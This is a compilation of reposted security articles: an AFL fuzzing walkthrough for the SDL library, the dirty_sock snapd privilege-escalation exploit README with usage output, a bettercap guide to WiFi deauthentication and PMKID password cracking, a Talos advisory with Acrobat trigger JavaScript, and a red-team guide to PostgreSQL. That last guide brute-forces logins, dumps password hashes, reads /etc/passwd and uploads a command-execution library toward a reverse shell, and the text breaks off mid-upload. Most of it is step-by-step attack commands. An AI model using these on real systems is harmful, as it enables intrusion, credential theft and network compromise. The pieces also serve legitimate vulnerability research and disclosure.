Let’s compile it: $ afl-clang-fast -o harness_sdl harness_sdl.c -g -O2 \ -D_FORTIFY_SOURCE=0 -fsanitize=address \ -I/usr/local/include/SDL -D_GNU_SOURCE=1 -D_REENTRANT \ -L/usr/local/lib -Wl,-rpath,/usr/local/lib -lSDL -lX11 -lpthread And start the fuzzing process: $ afl-fuzz -i corpus_wave/ -o output_wave -m none -M fuzzer_1_SDL_sound \ -- /home/radu/apps/sdl_player_lib/harness_sdl @@ As you can see, starting a fuzzing job is easy, we just execute afl-fuzz with the following parameters: The initial corpus ( -i corpus_wave ) The output of the fuzzing attempt ( -o output_wave ) Path to the compiled harness Instruct AFL how to send the test sample to the fuzzed program ( @@ for providing it as an argument) Memory limit for the child process ( -m none since ASAN needs close to 20TB of memory on x86_64 architecture) There are other useful parameters that you can use, such as specifying a dictionary containing strings related to a certain file format, which would theoretically help the mutation engine reach certain paths quicker. But for now, let’s see how this goes. My display is ok, that is just a mountain in the back. We are conducting this investigation on a machine with 32GB of RAM, having 2 AMD Opteron 6328 CPUs, each with 4 cores per socket and 2 threads per core, giving us a total of 16 threads. As we can observe, we get 170 evaluated samples per second as the fuzzing speed. Can we do better than that? Optimizing for Better Fuzzing Speed Some of the things we can tweak are: By default, AFL forks a process every time it tests a different input. We can control AFL to run multiple fuzz cases in a single instance of the program, rather than reverting the program state back for every test sample. This will reduce the time spent in the kernel space and improve the fuzzing speed. This is called AFL_PERSISTENT mode. We can do that by including the __AFL_LOOP(1000) macro within our test harness. 
According to this, specifying the macro will force AFL to run 1000 times, with 1000 different inputs fed to the library. After that, the process is restarted by AFL. This ensures we regularly replace the process to avoid memory leaks. The test case specified as the initial corpus is 119KB, which is too much. Maybe we can find a significantly smaller test case? Or provide more test cases, to increase the initial code coverage? We are running the fuzzer from a hard disk. If we switch to a ramdisk, forcing the fuzzer to get its testcases directly from RAM, we might get a boost from this too. Last but not the least, we can run multiple instances in parallel, enforcing AFL to use 1 CPU for one fuzzing instance. Let’s see how our fuzzer performs with all these changes. Run, Fuzzer, run! For one instance, we get a 2.4x improvement speed and already a crash! Running one master instance and four more slave instances, we get the following stats: $ afl-whatsup -s output_wave/ status check tool for afl-fuzz by <lcamtuf@google.com> Summary stats ============= Fuzzers alive : 5 Total run time : 0 days, 0 hours Total execs : 0 million Cumulative speed : 1587 execs/sec Pending paths : 6 faves, 35 total Pending per fuzzer : 1 faves, 7 total (on average) Crashes found : 22 locally unique With 5 parallel fuzzers, we get more than 1500 executions per second, which is a decent speed. Let’s see them working! Results After one day of fuzzing, we got a total of 60 unique crashes. Triaging them, we obtained 12 notable ones, which were reported to the SDL community and MITRE. In effect, CVE-2019-7572, CVE-2019-7573, CVE-2019-7574, CVE-2019-7575, CVE-2019-7576, CVE-2019-7577, CVE-2019-7578, CVE-2019-7635, CVE-2019-7636, CVE-2019-7637, CVE-2019-7638 were assigned. The maintainers of the library acknowledged that the vulnerabilities are present in the last version (2.0.9) of the library as well. 
Just to emphasize the fact that some bugs can stay well-hidden for years, some of the vulnerabilities were introduced with a commit dating from 2006 and have never been discovered until now. LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS The Ixia's Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia test platforms. The ATI Research Center continuously monitors threats as they appear in the wild. Customers of our BreakingPoint product have access to strikes for different attacks, allowing them to test their currently deployed security controls’ ability to detect or block such attacks; this capability can afford you time to patch your deployed web applications. Our monitoring of in-the-wild attackers ensures that such attacks are also blocked for customers of Ixia ThreatARMOR. Sursa: https://www.ixiacom.com/company/blog/how-use-fuzzing-security-research
dirty_sock: Linux Privilege Escalation (via snapd)

In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the blog posting here.

Ubuntu comes with snapd by default, but any distribution should be exploitable if it has this package installed. You can easily check if your system is vulnerable. Run the command below. If your snapd is 2.37.1 or newer, you are safe.

$ snap version
...
snapd 2.37.1
...

Usage

Version One (use in most cases)

This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these values. Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.

To exploit, first create an account at the Ubuntu SSO. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to the public key you uploaded):

python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"
[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!
[Script will automatically ssh to localhost with the SSH key here]

Version Two (use in special cases)

This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps.
Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time. dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands. As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments. Note for clarity: This version of the exploit does not hide inside a malicious snap. Instead, it uses a malicious snap as a delivery mechanism for the user creation payload. This is possible due to the same uid=0 bug as version 1 This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax. Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details. To exploit, simply run the script with no arguments on a vulnerable system. python3 ./dirty_sockv2.py [+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0; [+] Binding to socket file... [+] Connecting to snapd API... [+] Deleting trojan snap (and sleeping 5 seconds)... [+] Installing the trojan snap (and sleeping 8 seconds)... [+] Deleting trojan snap (and sleeping 5 seconds)... ******************** Success! 
You can now `su` to the following account and use sudo: username: dirty_sock password: dirty_sock ******************** Troubleshooting If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing snap changes and then snap change #, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable. Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost). Please open issues for anything weird. Disclosure Info The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread here. I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself. Public advisory links: https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing https://usn.ubuntu.com/3887-1/ Sursa: https://github.com/initstring/dirty_sock/
Pwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attack

2019-02-13
bettercap, deauth, handshake, hashcat, pmkid, rsn, rsn pmkid, wpa, wpa2

In this post, I’ll talk about the new WiFi related features that have been recently implemented into bettercap, starting from how the EAPOL 4-way handshake capturing has been automated, to a whole new type of attack that will allow us to recover WPA PSK passwords of an AP without clients.

We’ll start with the assumption that your WiFi card supports monitor mode and packet injection (I use an AWUS1900 with this driver), that you have a working hashcat (v4.2.0 or higher is required) installation (ideally with GPU support enabled) for cracking and that you know how to use it properly either for dictionary or brute-force attacks, as no tips on how to tune the masks and/or generate proper dictionaries will be given.

On newer macOS laptops, the builtin WiFi interface en0 already supports monitor mode, meaning you won’t need a Linux VM in order to run this.

Deauth and 4-way Handshake Capture

First things first, let’s try a classical deauthentication attack: we’ll start bettercap, enable the wifi.recon module with channel hopping and configure the ticker module to refresh our screen every second with an updated view of the nearby WiFi networks (replace wlan0 with the interface you want to use):

sudo bettercap -iface wlan0
# this will set the interface in monitor mode and start channel hopping on all supported frequencies
> wifi.recon on
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
> set wifi.show.sort clients desc
# every second, clear our view and present an updated list of nearby WiFi networks
> set ticker.commands 'clear; wifi.show'
> ticker on

You should now see the list of nearby networks, refreshed every second. Assuming Casa-2.4 is the network we want to attack, let’s stick to channel 1 in order to avoid jumping to other frequencies and potentially losing useful packets:

> wifi.recon.channel 1

What we want to do now is force one or more of the client stations (we can see 5 of them for this AP) to disconnect by forging fake deauthentication packets. Once they reconnect, hopefully, bettercap will capture the needed EAPOL frames of the handshake that we’ll later pass to hashcat for cracking (replace e0:xx:xx:xx:xx:xx with the BSSID of your target AP):

> wifi.deauth e0:xx:xx:xx:xx:xx

If everything worked as expected and you’re close enough to the AP and the clients, bettercap will start informing you that complete handshakes have been captured (you can customize the pcap file output by changing the wifi.handshakes.file parameter). Not only will bettercap check for complete handshakes and dump them only when all the required packets have been captured, but it will also append to the file one beacon packet for each AP, in order to allow any tool reading the pcap to detect both the BSSIDs and the ESSIDs.

The downsides of this attack are obvious: no clients = no party. Moreover, given that we need to wait for at least one of them to reconnect, it can potentially take some time.

4-way Handshake Cracking

Once we have successfully captured the EAPOL frames required by hashcat in order to crack the PSK, we’ll need to convert the pcap output file to the hccapx format that hashcat can read. In order to do so, we can either use this online service, or install the hashcat-utils ourselves and convert the file locally:

/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx

You can now proceed to crack the handshake(s) either by dictionary attack or brute-force.
For instance, to try all 8-digit combinations:

/path/to/hashcat -m2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'

And this is it, the evergreen deauthentication attack in all its simplicity, performed with just one tool … let’s get to the fun part now.

Client-less PMKID Attack

In 2018 the hashcat authors disclosed a new type of attack which not only relies on one single packet, but also doesn’t require any clients to be connected to our target AP. If clients are connected, it doesn’t require us to send deauth frames to them: there’s no interaction between the attacker and client stations, only between the attacker and the AP, and that interaction, if the router is vulnerable, is almost immediate!

It turns out that a lot of modern routers append an optional field at the end of the first EAPOL frame sent by the AP itself when someone is associating, the so-called Robust Security Network (RSN) element, which includes something called PMKID. As explained in the original post, the PMKID is derived by using data which is known to us:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Since the “PMK Name” string is constant, we know both the BSSID of the AP and the station, and the PMK is the same one obtained from a full 4-way handshake, this is all hashcat needs in order to crack the PSK and recover the passphrase!

Here’s where the new wifi.assoc command comes into play: instead of deauthenticating existing clients as shown in the previous attack and waiting for the full handshake to be captured, we’ll simply start to associate with the target AP and listen for an EAPOL frame containing the RSN PMKID data.
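The PMKID formula above can be reproduced with nothing but Python's standard library, which also shows why a single captured value is enough for an offline guess-and-check loop. This is a minimal sketch, not how hashcat is implemented: the helper names are hypothetical, the MAC addresses and passphrases in the usage part are made up, and the PMK derivation (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes) is the standard WPA2-PSK derivation rather than something stated in this post.

```python
import hashlib
import hmac


def mac_to_bytes(mac: str) -> bytes:
    """Convert 'aa:bb:cc:dd:ee:ff' into its 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Standard WPA2-PSK derivation: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" | MAC_AP | MAC_STA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def crack_pmkid(candidates, ssid, mac_ap, mac_sta, captured):
    """Return the first candidate passphrase whose PMKID matches the captured one."""
    for candidate in candidates:
        pmkid = compute_pmkid(derive_pmk(candidate, ssid), mac_ap, mac_sta)
        if hmac.compare_digest(pmkid, captured):
            return candidate
    return None


if __name__ == "__main__":
    ap = mac_to_bytes("e0:11:22:33:44:55")   # made-up BSSID
    sta = mac_to_bytes("02:00:00:00:00:01")  # made-up station MAC
    # Simulate a capture for a network whose passphrase is "12345678"
    captured = compute_pmkid(derive_pmk("12345678", "Casa-2.4"), ap, sta)
    guesses = (f"{n:08d}" for n in range(12345670, 12345680))
    print(crack_pmkid(guesses, "Casa-2.4", ap, sta, captured))
```

Each guess costs one PBKDF2 run, which is the expensive step; that is why a GPU-backed tool is used for real keyspaces.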
Say we’re still listening on channel 1 (since we previously ran wifi.recon.channel 1), let’s send such an association request to every AP and see who’ll respond with useful information:

# wifi.assoc supports 'all' (or `*`) or a specific BSSID, just like wifi.deauth
> wifi.assoc all

All nearby vulnerable routers (and let me reiterate: a lot of them are vulnerable) will start sending you the PMKID, which bettercap will dump to the usual pcap file.

PMKID Cracking

We’ll now need to convert the PMKID data in the pcap file we just captured to a hash format that hashcat can understand; for this we’ll use hcxpcaptool:

/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap

We can now proceed to crack the bettercap-wifi-handshakes.pmkid file so generated by using algorithm number 16800:

/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'

Recap

Goodbye airmon, airodump, aireplay and whatnots: one tool to rule them all!
Goodbye Kali VMs on macOS: these modules work natively out of the box, with the default Apple hardware ❤️
Full 4-way handshakes are for n00bs: just one association request and most routers will send us enough key material.

Enjoy

Sursa: https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/#
Talos Vulnerability Report TALOS-2018-0714

Adobe Acrobat Reader DC text field "comb" property remote code execution vulnerability

February 12, 2019

CVE Number
CVE-2019-7039

Summary
A specific JavaScript code embedded in a PDF file can lead to a heap corruption when opening a PDF document in Adobe Acrobat Reader DC, version 2019.8.20071. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

Tested Versions
Adobe Acrobat Reader DC 2019.8.20071

Product URLs
https://get.adobe.com/reader/

CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE
CWE-252: Unchecked Return Value

Details
Adobe Acrobat Reader is the most popular and feature-rich PDF reader on the market today. It has a large user base and is usually the default PDF reader on systems. The software integrates into web browsers as a plugin for rendering PDFs, as well. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.

Adobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow interactive PDF forms. This gives a potential attacker the ability to precisely control memory layout and poses an additional attack surface. While executing the following piece of code, an arbitrary out-of-bounds memory access can occur:

app.activeDocs[0].getField('txt1')['charLimit'] = 0xed000;
app.activeDocs[0].getField('txt1')['comb'] = {};

While manipulating text fields in a PDF, when the comb property is set to true, the rendered text field is split into boxes, with each character of the text field placed into its own box. The number of boxes is controlled by the charLimit property. Above, we set the charLimit property to a large value, which ultimately leads to out-of-bounds memory access.
Specifically, the out-of-bounds access happens at the following code: Breakpoint 5 hit eax=540f0ba0 ebx=0c229a98 ecx=001400d4 edx=00007532 esi=410d8ff0 edi=410d8fe0 eip=6b5c53eb esp=00cfe768 ebp=00cfe7f4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x150d6f: 6b5c53eb f30f110488 movss dword ptr [eax+ecx*4],xmm0 ds:002b:545f0ef0=c0c0c0c0 [0] 1:009> u AcroRd32!CTJPEGWriter::CTJPEGWriter+0x150d6f: 6b5c53eb f30f110488 movss dword ptr [eax+ecx*4],xmm0 6b5c53f0 ff83e4010000 inc dword ptr [ebx+1E4h] [1] 6b5c53f6 8b4708 mov eax,dword ptr [edi+8] 6b5c53f9 8945f4 mov dword ptr [ebp-0Ch],eax 6b5c53fc 8b470c mov eax,dword ptr [edi+0Ch] 6b5c53ff 8945f8 mov dword ptr [ebp-8],eax 6b5c5402 8d45f4 lea eax,[ebp-0Ch] 6b5c5405 50 push eax 1:009> dd eax 540f0ba0 3aded289 418c0e56 3aded289 3f000000 540f0bb0 3b5ed289 418c0e56 3b5ed289 3f000000 540f0bc0 3ba71de7 418c0e56 3ba71de7 3f000000 540f0bd0 3bded289 418c0e56 3bded289 3f000000 540f0be0 3c0b4396 418c0e56 3c0b4396 3f000000 540f0bf0 3c28c155 418c0e56 3c28c155 3f000000 540f0c00 3c449ba6 418c0e56 3c449ba6 3f000000 540f0c10 3c6075f7 418c0e56 3c6075f7 3f000000 1:009> !heap -p -a eax [2] address 540f0ba0 found in _DPH_HEAP_ROOT @ e71000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 43870b94: 540f0ba0 500460 - 540f0000 502000 6d67abb0 verifier!VerifierDisableFaultInjectionExclusionRange+0x000034c0 6d67b07e verifier!VerifierDisableFaultInjectionExclusionRange+0x0000398e 772c34bc ntdll!RtlpNtSetValueKey+0x000041cc 7726e01a ntdll!RtlCaptureStackContext+0x0000f16a 77221453 ntdll!RtlReAllocateHeap+0x00000043 74bc1320 ucrtbase!realloc_base+0x00000030 6b5c579a AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0015111e [3] 6b5b0328 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0013bcac 6b5d9881 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00165205 6b5d9238 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00164bbc 6b5d90b3 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00164a37 6b5d8ce3 
AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00164667 6b5d89d7 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0016435b 6b5d75ae AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00162f32 6b5d704a AcroRd32!CTJPEGWriter::CTJPEGWriter+0x001629ce 6b60e0db AcroRd32!CTJPEGDecoderRelease+0x0002436b 6b5d6cc3 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00162647 6b5d63db AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00161d5f 6b6e78fc AcroRd32!CTJPEGDecoderRelease+0x000fdb8c 6b6e69e3 AcroRd32!CTJPEGDecoderRelease+0x000fcc73 6b4714d9 AcroRd32!DllCanUnloadNow+0x0001fcaf 6b470fa5 AcroRd32!DllCanUnloadNow+0x0001f77b 6b470d56 AcroRd32!DllCanUnloadNow+0x0001f52c 6b411267 AcroRd32!AcroWinMainSandbox+0x000077f1 7554be6b USER32!AddClipboardFormatListener+0x0000049b 7554833a USER32!DispatchMessageW+0x0000097a 75547bee USER32!DispatchMessageW+0x0000022e 755479d0 USER32!DispatchMessageW+0x00000010 6b46ffca AcroRd32!DllCanUnloadNow+0x0001e7a0 6b46fd92 AcroRd32!DllCanUnloadNow+0x0001e568 6b40a359 AcroRd32!AcroWinMainSandbox+0x000008e3 6b409c2d AcroRd32!AcroWinMainSandbox+0x000001b7 When the breakpoint is hit at [0] we can see that, we are writing to a buffer pointed to by eax indexed by ecx and then at [2], we see where the buffer is allocated and that its size is large enough. At [1], we also see that the index that ends up in ecx is increased. This code loops many times, bounded by the charLimit property set before. Eventually, the index will be increased enough that the buffer isn't big enough, at which point a different path will be taken, which leads to a call to realloc, at the same location we see at [3] above. This is the code that follows: .text:601E577F lea eax, [ecx+1388h] .text:601E5785 mov [ebx+1D8h], eax .text:601E578B shl eax, 3 .text:601E578E push eax .text:601E578F push dword ptr [ebx+1DCh] .text:601E5795 call indirect_realloc .text:601E579A mov [ebx+1DCh], eax [4] At [4], the pointer returned by realloc is saved in ebx+1dc, which is where the pointer to the buffer used at [0] is stored. 
Notice that there is no check on the return value of this realloc call. Since this call is increasing the size of the buffer, which is ultimately controlled by the charLimit value, the call to realloc can fail and return NULL. The unchecked NULL value is then written to the buffer pointer and the code loops around to [0]. Usually this would cause just a NULL pointer dereference, but since the index in ecx keeps growing, and is multiplied by 4, we can control the offset from NULL at which the write lands, which results in an arbitrary write. And indeed, if we remove the breakpoints, this results in the following crash:

(21d4.157c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0c229a98 ecx=003ae9fc edx=00007532 esi=410d8ff0 edi=410d8fe0
eip=6b5c53eb esp=00cfe768 ebp=00cfe7f4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
AcroRd32!CTJPEGWriter::CTJPEGWriter+0x150d6f:
6b5c53eb f30f110488 movss dword ptr [eax+ecx*4],xmm0 ds:002b:00eba7f0=????????
1:009> dd ecx*4
00eba7f0 ???????? ???????? ???????? ????????
00eba800 ???????? ???????? ???????? ????????
00eba810 ???????? ???????? ???????? ????????
00eba820 ???????? ???????? ???????? ????????
00eba830 ???????? ???????? ???????? ????????
00eba840 ???????? ???????? ???????? ????????
00eba850 ???????? ???????? ???????? ????????
00eba860 ???????? ???????? ???????? ????????

Notice in the above debugging output that eax is NULL, but ecx is large enough to reach userland memory. The above crash is exhibited by the proof of concept with page heap enabled. With further memory control, one could choose more precisely the buffer size at which the realloc fails, and thereby control where the write lands. This could possibly result in further memory corruption and arbitrary code execution.
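The address arithmetic behind both register dumps can be checked by hand. The short Python sketch below recomputes the effective address of the movss store from the eax and ecx values shown in the report; the helper names store_address and in_bounds are made up for illustration, and the buffer base and size are the UserAddr and UserSize values from the !heap output.

```python
def store_address(eax: int, ecx: int) -> int:
    """Effective address of `movss dword ptr [eax+ecx*4], xmm0` on 32-bit x86."""
    return (eax + ecx * 4) & 0xFFFFFFFF


def in_bounds(base: int, size: int, address: int, width: int = 4) -> bool:
    """True if a `width`-byte store at `address` stays inside [base, base + size)."""
    return base <= address and address + width <= base + size


if __name__ == "__main__":
    # Breakpoint at [0]: buffer at 0x540f0ba0 with UserSize 0x500460
    first = store_address(0x540F0BA0, 0x001400D4)
    print(hex(first), in_bounds(0x540F0BA0, 0x500460, first))  # 0x545f0ef0 True

    # Crash: the buffer pointer is NULL after the failed realloc
    crash = store_address(0x00000000, 0x003AE9FC)
    print(hex(crash))  # 0xeba7f0
```

Both results match the ds:002b: addresses in the debugger output: the first store is still inside the allocation, while the second one is simply NULL plus four times the attacker-influenced index.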
Timeline 2018-11-20 - Vendor Disclosure 2019-02-12 - Public Release Credit Discovered by Aleksandar Nikolic of Cisco Talos. Sursa: https://www.talosintelligence.com/reports/TALOS-2018-0714
PostgreSQL for red teams 13 Feb 2019 unix-ninja Security @ PostgreSQL is a popular open-source relational database with wide platform support. You can find it on a variety of POSIX operating systems, as well as Windows. All software increases exploitation surface area when complexity grows, and Postgres is no exception here. Depending on the configurations of a system, Postgres can be a valuable resource for a red team to leverage in system compromise. Postgres is so commonly available and supported that there are many prebuilt tools which can abstract the exploitation process for you (see Metasploit for some examples.) But I find that getting your hands a bit dirtier helps the learning process. It's important to understand the fundamentals of what you are trying to accomplish before you abstract it away. So let's start hacking PostgreSQL! I shouldn't need to say this, but please don't abuse this knowledge. The targets for this article are red teams, not malicious actors. Please be responsible. Service discovery Nmap is a decent goto scanner for service discovery. We could have easily picked massscan or unicornscan or a host of others, but this works well. The simplest of nmap commands is usually all it takes to discover a Postgres target. (In this example, we will target a single machine called sqlserver, but we can replace that with a range of machines or a subnet if we needed to.) $ nmap sqlserver Starting Nmap 7.40 ( https://nmap.org ) at 2019-02-11 08:42 UTC Nmap scan report for sqlserver (172.16.65.133) Host is up (0.0000020s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 5432/tcp open postgresql Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds At this point, we've verified that the target is alive, and there is a PostgreSQL service running and exposed to the outside. Service access We could use many different methods to gain access to confidential services. 
Intelligence feeds could reveal access if you are lucky, or perhaps there is a shared folder with credentials, or an unsecured configuration available; but sometimes we need to put a little more effort into it. Credential stuffing (effectively brute forcing credential pairs with a list of usernames and passwords) may be a necessary tactic, and there are plenty of tools out there to help. We could easily use tools like Hydra, Medusa, Metasploit, or many others, but we are going to use ncrack in these examples. For a first pass, we will try to attack the default account postgres using the Rockyou breach list. In Kali Linux, the Rockyou list is provided out-of-the-box (you can find it at /usr/share/wordlists/rockyou.txt.gz). Since I am using Kali for this example, we will first need to unpack the archive before using it. $ gunzip /usr/share/wordlists/rockyou.txt.gz Next, we will try to use this list against the PostgreSQL service by means of ncrack. We will specify the service we are attacking (psql://), the target (sqlserver), the user we want to target (postgres), and the wordlist we want to ingest for password candidates (rockyou.txt). $ ncrack psql://sqlserver -u postgres -P /usr/share/wordlists/rockyou.txt Starting Ncrack 0.5 ( http://ncrack.org ) at 2019-02-11 09:24 UTC Discovered credentials for psql on 172.16.65.133 5432/tcp: 172.16.65.133 5432/tcp psql: 'postgres' 'airforce' Ncrack done: 1 service scanned in 69.02 seconds. Ncrack finished. In this example, we have discovered the credentials for an available user. If this had been unsuccessful, we could always try to enumerate further users and test the same passwords against those. Ncrack even provides the option to load a list of users from a file using the -U flag. With credentials in hand, we can use the psql cli utility to connect to our target remote database. 
$ psql --user postgres -h sqlserver Password for user postgres: psql (9.6.2) SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off) Type "help" for help. postgres=# Success! Service reconnaissance Now that we have access, we want to do a little recon. Start by enumerating the available users and roles. Note that we are intentionally looking for usename in the example below. postgres=# \du List of roles Role name | Attributes | Member of -----------+------------------------------------------------------------+----------- postgres | Superuser, Create role, Create DB, Replication, Bypass RLS | {} postgres=# select usename, passwd from pg_shadow; usename | passwd ----------+------------------------------------- postgres | md5fffc0bd6f9cb15de21317fd1f61df60f (1 row) Next, list the available databases and tables. postgres=# \l List of databases Name | Owner | Encoding | Collate | Ctype | Access privileges -----------+----------+----------+---------+---------+----------------------- postgres | postgres | UTF8 | C.UTF-8 | C.UTF-8 | template0 | postgres | UTF8 | C.UTF-8 | C.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres template1 | postgres | UTF8 | C.UTF-8 | C.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres (3 rows) postgres=# \dt No relations found. This particular box doesn't have too much on it, but sometimes you may come across other valuable information you can leverage to pivot later. Command execution Postgres abstracts certain system level functions which it will expose to the database operator. 
We can easily discover, for example, the contents of the process' working directory using the following: postgres=# select pg_ls_dir('./'); pg_ls_dir ---------------------- PG_VERSION base global pg_clog pg_commit_ts pg_dynshmem pg_logical pg_multixact pg_notify pg_replslot pg_serial pg_snapshots pg_stat pg_stat_tmp pg_subtrans pg_tblspc pg_twophase pg_xlog postgresql.auto.conf postmaster.pid postmaster.opts (21 rows) We can take this a step farther and read the contents of these files. postgres=# select pg_read_file('PG_VERSION'); pg_read_file -------------- 9.6 + (1 row) We can also choose the offset we want to start reading at, and the number of bytes we want to read. For example, let's read a specific 12 bytes near the end of postgresql.auto.conf. postgres=# select pg_read_file('postgresql.auto.conf', 66, 12); pg_read_file -------------- ALTER SYSTEM (1 row) But there are limitations to the pg_read_file() function. postgres=# select pg_read_file('/etc/passwd'); ERROR: absolute path not allowed postgres=# select pg_read_file('../../../../etc/passwd'); ERROR: path must be in or below the current directory Don't despair. We can create a new table and COPY the contents of files on disk into it. Then, we can query the table to see the contents. postgres=# create table docs (data TEXT); CREATE TABLE postgres=# copy docs from '/etc/passwd'; COPY 52 postgres=# select * from docs limit 10; data --------------------------------------------------- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin (10 rows) Getting a reverse shell So now we have access to our service, we can read from files on disk. 
Now it's time to see if we can launch a reverse shell. Again, Metasploit has a pretty nice payload to abstract this whole process, but what's the fun in that? [Dionach] has a great little library, pgexec, written to provide a function called pg_exec(). Can you guess what it does? pgexec needs to be compiled against the same major and minor versions as the running Postgres instance. You should be able to just query Postgres for this information. postgres=# select version(); But they also provide prebuilt binaries for many common versions. Let's just grab one of those. (Note the raw URL and -L: the blob URL would return an HTML page rather than the binary.) $ curl -L -o pg_exec.so https://github.com/Dionach/pgexec/raw/master/libraries/pg_exec-9.6.so We now have our library, but how do we get it to our target? Fortunately, we can create a large object in Postgres (identified by its LOID) to store this data and then try to write it to disk. postgres=# select lo_creat(-1); lo_creat ---------- 16391 (1 row) Make a note of the lo_creat ID which was generated. You will need this in the examples below. However, there is a caveat here. Each large object page can hold a maximum of 2K, so we need to split the payload. We can do this in our bash shell (just be sure to use the same working directory as you are using for psql.) $ split -b 2048 pg_exec.so Now we can script the SQL statements we need to upload all the pieces of this payload. In this example, we are piping them all into a file called upload.sql. Remember to replace ${LOID} with the ID you grabbed earlier. $ CNT=0; for f in x*; do echo '\set c'${CNT}' `base64 -w 0 '${f}'`'; echo 'INSERT INTO pg_largeobject (loid, pageno, data) values ('${LOID}', '${CNT}', decode(:'"'"c${CNT}"'"', '"'"'base64'"'"'));'; CNT=$(( CNT + 1 )); done > upload.sql With our SQL file in hand, we can include these statements straight from disk into psql. (Again, this assumes that upload.sql is in the same working directory as psql.) postgres=# \include upload.sql INSERT 0 1 INSERT 0 1 INSERT 